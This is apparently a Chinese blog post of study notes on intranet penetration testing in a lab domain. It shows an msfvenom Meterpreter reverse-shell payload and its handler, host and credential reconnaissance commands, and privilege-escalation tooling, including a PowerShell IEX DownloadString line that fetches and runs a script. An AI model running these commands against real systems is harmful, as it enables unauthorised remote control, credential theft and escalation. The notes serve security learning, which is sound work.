(注:以下内容大部分是看师傅们的博客为了印象更深而做的笔记,非原创)
内网渗透可以大概分为三个部分:
1.信息搜集+内网提权+隧道搭建
2.内网横向移动
3.持久化控制:后门+免杀
(1)内网架构及反弹shell
内网环境:
域控:域控制器(Domain Controller,DC)是一台安装并运行Active Directory的服务器,它包含Active Directory数据库的可写副本,参与Active Directory复制并控制对网络资源的访问。在域中,域控制器统一管理帐户数据库、所有的用 户登录、资源访问认证及其管理任务。一个域可以有一个或多个域控制器,各域控制器间地位平等,管理员可以在任一台域控制器上更新域中的信息,更新的信息会 自动传递到网络中的其他域控制器中
如图攻击机与内网win7可以通信,win7,server2012(域控)与xp在同一个域内,其中win7与server2012在同一个局域网内,server2012在另外一个局域网内
我们已经拿到了win7的webshell,接下来我们需要通过kali拿到反弹shell,之后再横向拿下域控,在拿下xp这台主机。
msf反弹shell
为什么要反弹shell
一般来说目标主机与我们攻击者之间都存在防火墙等设备,限制了流入主机的流量,导致我们直接连接目标主机会失败,所以想让目标主机来连接我们
如何反弹shell
反弹shell可以用kali中自带的msfconsole+msfvenom,或者cs等等,有的时候还要进行混淆免杀,比如Backdoor-factory等
1生成目标文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=10.188.10.200 LPORT=6666 -f exe > attack.exe
2通过webshell上传到主机并运行
3打开msf使用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置lport与lhost
4得到反弹的meterpreter
ps:msfvenom参数声明:
-p 指定需要使用的payload
-l payloads 查看所有的攻击载荷
-e 指定需要使用的编码
-i 5 payload的编码次数为5
-f 生成文件格式
lhost,lport分别为攻击机的ip与端口
(2)信息收集1
本机信息收集(主要任务是探测本机简单信息,为提权和进一步信息搜集做准备,其中有价值的信息主要是有网段信息,户账户和系统信息)
whoami /all 查询当前用户
ipconfig /add 列出网络信息
net user 查看当前用户的用户账户
systeminfo 查询主机消息
tasklist 查看进程列表
query user 查询当前用户以及登录时间等信息
arp -a 打印arp缓存等信息
netstat -ano | findstr "3306" 查询相关端口信息
net share 查看共享资源
net session 列出或断开本地计算机和与之连接的客户端的会话
cmdkey list 列出本机凭据
wmic product 查询安装软件信息
wmic service 查询本机服务信息
netsh firewall show config 查看防火墙设置
net statistics workstation 本地工作站或服务器服务的统计记录
上述命令按照是否常用顺序排列
其中ipconfig和net user 以及systeminfo非常重要
通过ipconfig可以查到当前主机位于哪个网段,如果还存在其他网段,
那么极有可能存在另一个局域网区域,
比如上述环境中的win7,
既与kali在同一个外网,
也存在于另一个网192.168.174.1中,
所以进一步的信息搜集可以对这个网段扫描。
通过net user更是可以查看有哪些用户存在,为下一步的域渗透和提权做准备,
通过systeminfo查看本机信息,获取哪些补丁没有打,为接下来提权做准备
(3)本地提权
溢出漏洞提权
溢出漏洞:
缓冲区溢出漏洞,是由于恶意代码在执行时,向缓冲区写入超过其长度的内容,造成进程的堆栈被更改,从而执行恶意代码,达到攻击目的
我们主要利用工具找出相关系统漏洞并加以利用,配合msf或者cs等相关工具实现提权。
msf提权
msf提权
msf > use post/windows/gather/enum_patches
通过已经获取的meterpreter的session查询目标主机存在的可以利用的漏洞
提权辅助工具:Windows–exploit-suggester.py:
下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester
1,安装xlrd包(注意python2、3版本的pip问题)
使用python2 的pip来安装xlrd包
命令:python2 -m pip install xlrd==1.2.0
2,获取对应的漏洞信息库(注意要使用python2来获取)
命令:python2 windows-exploit-suggester.py --update
3,生成要进行对比的靶机的系统信息
命令:systeminfo > systeminfo_win10.txt #在对应的靶机上运行该命令
4,使用windows-exploit-suggester.py来进行对比
命令:python2 windows-exploit-suggester.py --database 2021-01-13-mssb.xls --systeminfo systeminfo_win10.txt
windows-exploit-suggester.py -d vulinfo.xls -i systeminfo.txt
其中systeminfo.txt内容是通过systeminfo命令获取的系统信息,里面记录了所有打过的补丁,
windows-exploit-suggester.py这个py文件根据补丁记录与漏洞信息(vulinfo.xls)进行比较,
获得可以利用的相关漏洞。
Sherlock提权:Sherlock是一个在Windows下用于本地提权的PowerShell脚本
下载地址:https://github.com/rasta-mouse/Sherlock
使用方法:
本地加载脚本
Import-Module Sherlock.ps1
远程加载脚本
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
检查漏洞
Find-AllVulns
出现Appears Vulnerable就是存在漏洞
powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
powershell Find-MS14058
elevate ms14-058 smb
vulnscan提权
地址:https://github.com/chroblert/WindowsVulnScan/
.\KBCollect.ps1 //收集信息
.\cve-check.py -u //创建CVEKB数据库
.\cve-check.py -U //更新CVEKB数据库中的hasPOC字段
.\cve-check.py -C -f KB.json //查看具有公开EXP的CVE
vulmap本地漏扫提权
地址:https://github.com/vulmon/Vulmap
当然还有其它方法,我这里就不一一列举了。在拿到可以利用的漏洞以后,可以使用msf自带的exploit模块进行攻击,或者在windows-kernel-exploits(https://github.com/SecWiKi/windows-kernel-exploits)公开的收集库中查找可以用来提权的exp。
234
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
